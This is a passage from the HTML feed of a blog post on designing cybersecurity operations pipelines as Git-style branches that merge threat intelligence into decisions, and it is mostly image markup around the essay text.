pipeline functioned like a Git repository? Each team acting as a branch, merging their insights and actions into a "main" pipeline to drive real-world impact. Join me on this "Git-inspired" approach to scalable cyber operations.]]></description><link>https://www.quasarops.com/p/cyberops-as-git-pipelines</link><guid isPermaLink="false">https://www.quasarops.com/p/cyberops-as-git-pipelines</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Fri, 04 Oct 2024 08:00:42 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/49458d81-0e1f-4fb0-8de9-73b8da79121c_1307x372.svg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!AQCy!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ab1339d-848b-45b9-b8b7-2cca3e55db75_1307x372.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!AQCy!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ab1339d-848b-45b9-b8b7-2cca3e55db75_1307x372.svg 424w, https://substackcdn.com/image/fetch/$s_!AQCy!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ab1339d-848b-45b9-b8b7-2cca3e55db75_1307x372.svg 848w, https://substackcdn.com/image/fetch/$s_!AQCy!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ab1339d-848b-45b9-b8b7-2cca3e55db75_1307x372.svg 1272w, https://substackcdn.com/image/fetch/$s_!AQCy!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ab1339d-848b-45b9-b8b7-2cca3e55db75_1307x372.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!AQCy!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ab1339d-848b-45b9-b8b7-2cca3e55db75_1307x372.svg" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8ab1339d-848b-45b9-b8b7-2cca3e55db75_1307x372.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;From Intel to Impact&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="From Intel to Impact" title="From Intel to Impact" srcset="https://substackcdn.com/image/fetch/$s_!AQCy!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ab1339d-848b-45b9-b8b7-2cca3e55db75_1307x372.svg 424w, https://substackcdn.com/image/fetch/$s_!AQCy!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ab1339d-848b-45b9-b8b7-2cca3e55db75_1307x372.svg 848w, https://substackcdn.com/image/fetch/$s_!AQCy!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ab1339d-848b-45b9-b8b7-2cca3e55db75_1307x372.svg 1272w, https://substackcdn.com/image/fetch/$s_!AQCy!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8ab1339d-848b-45b9-b8b7-2cca3e55db75_1307x372.svg 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>For a lot of us, intel somehow finds its way through the many nooks and crannies of our cyber operations pipeline and ends up doing some good stuff:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!9x6D!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6487c260-62c1-420e-b944-bd8e4f479fa5_1591x564.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!9x6D!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6487c260-62c1-420e-b944-bd8e4f479fa5_1591x564.svg 424w, https://substackcdn.com/image/fetch/$s_!9x6D!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6487c260-62c1-420e-b944-bd8e4f479fa5_1591x564.svg 848w, https://substackcdn.com/image/fetch/$s_!9x6D!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6487c260-62c1-420e-b944-bd8e4f479fa5_1591x564.svg 1272w, https://substackcdn.com/image/fetch/$s_!9x6D!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6487c260-62c1-420e-b944-bd8e4f479fa5_1591x564.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!9x6D!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6487c260-62c1-420e-b944-bd8e4f479fa5_1591x564.svg" width="1591" height="564" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6487c260-62c1-420e-b944-bd8e4f479fa5_1591x564.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:564,&quot;width&quot;:1591,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;From Intel to Impact&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="From Intel to Impact" title="From Intel to Impact" srcset="https://substackcdn.com/image/fetch/$s_!9x6D!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6487c260-62c1-420e-b944-bd8e4f479fa5_1591x564.svg 424w, https://substackcdn.com/image/fetch/$s_!9x6D!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6487c260-62c1-420e-b944-bd8e4f479fa5_1591x564.svg 848w, https://substackcdn.com/image/fetch/$s_!9x6D!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6487c260-62c1-420e-b944-bd8e4f479fa5_1591x564.svg 1272w, https://substackcdn.com/image/fetch/$s_!9x6D!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6487c260-62c1-420e-b944-bd8e4f479fa5_1591x564.svg 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>But as I've highlighted <a href="https://quasarops.com/p/the-problem-of-why-threat-informed-prioritization-in-security-operations-part-1/">here</a>&nbsp;and&nbsp;<a href="https://quasarops.com/p/the-uncertainty-of-intelligence-and-the-entropy-of-threats/">here</a>, <strong>it is hard to know exactly what happens in the middle</strong>. We know what we want:&nbsp;<em>to lower the operational risk of doing business for our companies, institutions, NGOs, etc</em>. What's unclear is this: What are the many interacting pieces that make this happen? Where are the chokepoints? Where is the friction? How efficiently is decision-making pushed through the pipes? And finally, what is the insight that it generates?</p><p>In my many adventures into Active Defence, you've seen me enter a few mazes, unravel a few knots and unfold a new pathway to understand the relationships between threat intel, data pipelines, hunting, detection and deception. I've noticed a stable pattern across all these incursions:&nbsp;<strong>a holistic view of operational data workflows</strong>.</p><p>I'm not talking about data merely in terms of logging telemetry from your systems, debugging information for your software, or capturing metrics, I'm talking about the <strong>underlying operational architecture</strong> of how your data, no matter the source, is converted into actionable insight, enriched at each step of an interconnected web of streams that pull the right levers and results in <strong>business decisions</strong>.</p><div class="pullquote"><p>For data and information to turn into insight, they have to engage the main operative engine of any business: decision-making.</p></div><p>Furthermore, I will risk a bold definition here: decision-making <em>is the act of transforming available information into actions that generate the conditions for more decisions to be made</em>.</p><p>Think about it in terms of <a href="https://www.amazon.com.au/dp/1476731713">finite and infinite games</a> (James P. Carse)</p><p><em>What?</em> Consider the following: decisions are only possible within the context of having options. <strong>When you don&#8217;t have options, there is no decision, there is just inertia</strong>, the kind of inertia that makes a rock continue indefinitely in outer space.</p><p>A rock floating in the vacuum of space experiences very little friction or other forces. Because of inertia, if that rock is moving, it will continue to move in a straight line at a constant speed practically forever, unless something acts upon it.</p><p>The whole point of making a decision is to give you the option to make more decisions in the future. You don&#8217;t want to end up in a checkmate situation, with no further moves to make. This is the equivalent of having your entire network encrypted by ransomware with no backups and no viable decryption options.</p><p>Information is essential to this process. <strong>Information is an optionality token</strong>. It can generate options for you and your business. As long as you can ingest information and convert it into insight, you can feed the decision-making machine of the business. This can translate into increased profit and optimized productivity.</p><p>There is a direct correlation between how efficiently information is transformed into insight, and your ability to make decisions that secure or transform the business.</p><p>But how do you know whether your cybersecurity operations workflows are efficient enough to translate information into action in optimal ways? How do you measure the utilization of these optionality tokens that information brings to you? How do you know if you are paying opportunity costs by not utilizing information flowing through your operational pipelines?</p><p>You need to start thinking about your cyber operations as a pipeline, an interconnected web of information that leads to actions taken or not taken. This can mean the difference between being in the newspapers the next day because of a new data breach, and nothing more than an actively exploited vulnerability patched just in time.</p><p>There is a meta-data layer of sorts, something that helps you keep your finger on the pulse.</p><p>I&#8217;m talking about operational cybersecurity business workflows, the interfaces between the people, process and technology that make your cyber operations run smoothly.</p><p>A data-centric organization does not structure its data pipeline around existing functions but redefines the functions around the data pipeline (like in&nbsp;<a href="https://quasarops.com/p/threat-hunt-vs-detection-engineering-the-saga-continues/">Threat Hunting vs Detection Engineering: The Saga Continues</a>).</p><p>It's all about information.</p><p>And information is about people.</p><p>In the context of practical cybersecurity operations, <em>the most important type of information you will ever encounter has a name: threat intelligence</em>.</p><p>If you cannot design, capture and monitor your operational pipeline in a way that is driving risk reduction and security control uplifts, all of it with a DevOps approach, then&nbsp;<strong>it will be hard to measure how intel translates into impact</strong>.</p><h2>An Approach, the Git Way</h2><p>So what is the best approach? What should your operational cyber pipeline look like? I came up with a few heuristics that might assist in the design process.</p><ol><li><p><strong>Intel and Impact Driven</strong>: Based on the profiling and continuous collection of information for the most important threats to your organisation, and clearly articulating how these threats drive impact by mapping them out to your risk or control areas at the other end.</p></li><li><p><strong>Threat Modelled</strong>: The ability to translate your existing intel into concrete attack paths that can compromise your assets or data <em>based on all the nuances of your specific environment</em> (and not just generic intel).</p></li><li><p><strong>DevOps Centric</strong>: A measure of consistency, automation readiness and your ability to scale operations at machine speed.</p></li><li><p><strong>Three to Five Key Milestones</strong>: The points in your pipeline where you keep your finger on the pulse, the stages that give you an indication of the state of information at a point in time, metrics should capture key risk and performance indicators at each stage.</p></li><li><p><strong>Fractal</strong>: Anywhere you look in your pipeline, at any milestone, you should be able to zoom in and find another pipeline that feeds the original milestone. This enables a design pattern where different teams feed into each other.</p></li></ol><p>We can forever argue whether these heuristics are good or bad, but the point of a heuristic is that it works as a collective and battle-tested mental shortcut our brains use to simplify complex situations and make quicker decisions (they can also lead to bias by the way, so always reflect later on your quick decision).</p><p>I am not sure if these rules of thumb above work for everyone else, they do for me. But my main problem has always been: how to visualize this pipeline? We are sensorial, and I don't know about you but I understand a topic much better when I can visualize it.</p><p>Is there a concept that can shape the mental model needed to even&nbsp;<em>think</em>&nbsp;of how a <strong>data-driven intel-to-impact</strong> pipeline should be represented? I've been searching for this for quite some time and until recently, my best option was a fishbone diagram style:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7RtG!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b65688-dbc2-4953-a146-cd6ecda6bd2f_1168x409.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7RtG!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b65688-dbc2-4953-a146-cd6ecda6bd2f_1168x409.png 424w, https://substackcdn.com/image/fetch/$s_!7RtG!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b65688-dbc2-4953-a146-cd6ecda6bd2f_1168x409.png 848w, https://substackcdn.com/image/fetch/$s_!7RtG!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b65688-dbc2-4953-a146-cd6ecda6bd2f_1168x409.png 1272w, https://substackcdn.com/image/fetch/$s_!7RtG!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b65688-dbc2-4953-a146-cd6ecda6bd2f_1168x409.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7RtG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b65688-dbc2-4953-a146-cd6ecda6bd2f_1168x409.png" width="1168" height="409" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/09b65688-dbc2-4953-a146-cd6ecda6bd2f_1168x409.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:409,&quot;width&quot;:1168,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;From Intel to Impact&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="From Intel to Impact" title="From Intel to Impact" srcset="https://substackcdn.com/image/fetch/$s_!7RtG!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b65688-dbc2-4953-a146-cd6ecda6bd2f_1168x409.png 424w, https://substackcdn.com/image/fetch/$s_!7RtG!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b65688-dbc2-4953-a146-cd6ecda6bd2f_1168x409.png 848w, https://substackcdn.com/image/fetch/$s_!7RtG!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b65688-dbc2-4953-a146-cd6ecda6bd2f_1168x409.png 1272w, https://substackcdn.com/image/fetch/$s_!7RtG!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b65688-dbc2-4953-a146-cd6ecda6bd2f_1168x409.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>However, something was missing because different teams or functions have dependencies on each other, before even feeding the main pipe.</p><p>The graph would look weird when representing these dependencies along the timeline of the main pipe:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!qdWv!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F003121ec-0d86-4a20-bd0f-8a918f315c6a_1188x429.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!qdWv!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F003121ec-0d86-4a20-bd0f-8a918f315c6a_1188x429.svg 424w, https://substackcdn.com/image/fetch/$s_!qdWv!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F003121ec-0d86-4a20-bd0f-8a918f315c6a_1188x429.svg 848w, https://substackcdn.com/image/fetch/$s_!qdWv!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F003121ec-0d86-4a20-bd0f-8a918f315c6a_1188x429.svg 1272w, https://substackcdn.com/image/fetch/$s_!qdWv!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F003121ec-0d86-4a20-bd0f-8a918f315c6a_1188x429.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!qdWv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F003121ec-0d86-4a20-bd0f-8a918f315c6a_1188x429.svg" width="1188" height="429" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/003121ec-0d86-4a20-bd0f-8a918f315c6a_1188x429.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:429,&quot;width&quot;:1188,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;From Intel to Impact&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="From Intel to Impact" title="From Intel to Impact" srcset="https://substackcdn.com/image/fetch/$s_!qdWv!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F003121ec-0d86-4a20-bd0f-8a918f315c6a_1188x429.svg 424w, https://substackcdn.com/image/fetch/$s_!qdWv!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F003121ec-0d86-4a20-bd0f-8a918f315c6a_1188x429.svg 848w, https://substackcdn.com/image/fetch/$s_!qdWv!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F003121ec-0d86-4a20-bd0f-8a918f315c6a_1188x429.svg 1272w, https://substackcdn.com/image/fetch/$s_!qdWv!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F003121ec-0d86-4a20-bd0f-8a918f315c6a_1188x429.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Finally, my inner DevOps gnome realised the answer was simpler than anticipated:&nbsp;<strong>you need to think of your data pipeline as a Git commit pipe and your team as a Repository</strong>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!oBNE!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b588503-7274-4b90-b069-fa4c0f471eb3_1080x800.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!oBNE!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b588503-7274-4b90-b069-fa4c0f471eb3_1080x800.png 424w, https://substackcdn.com/image/fetch/$s_!oBNE!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b588503-7274-4b90-b069-fa4c0f471eb3_1080x800.png 848w, https://substackcdn.com/image/fetch/$s_!oBNE!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b588503-7274-4b90-b069-fa4c0f471eb3_1080x800.png 1272w, https://substackcdn.com/image/fetch/$s_!oBNE!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b588503-7274-4b90-b069-fa4c0f471eb3_1080x800.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!oBNE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b588503-7274-4b90-b069-fa4c0f471eb3_1080x800.png" width="1080" height="800" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3b588503-7274-4b90-b069-fa4c0f471eb3_1080x800.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:800,&quot;width&quot;:1080,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;From Intel to Impact&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="From Intel to Impact" title="From Intel to Impact" srcset="https://substackcdn.com/image/fetch/$s_!oBNE!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b588503-7274-4b90-b069-fa4c0f471eb3_1080x800.png 424w, https://substackcdn.com/image/fetch/$s_!oBNE!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b588503-7274-4b90-b069-fa4c0f471eb3_1080x800.png 848w, https://substackcdn.com/image/fetch/$s_!oBNE!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b588503-7274-4b90-b069-fa4c0f471eb3_1080x800.png 1272w, https://substackcdn.com/image/fetch/$s_!oBNE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3b588503-7274-4b90-b069-fa4c0f471eb3_1080x800.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" 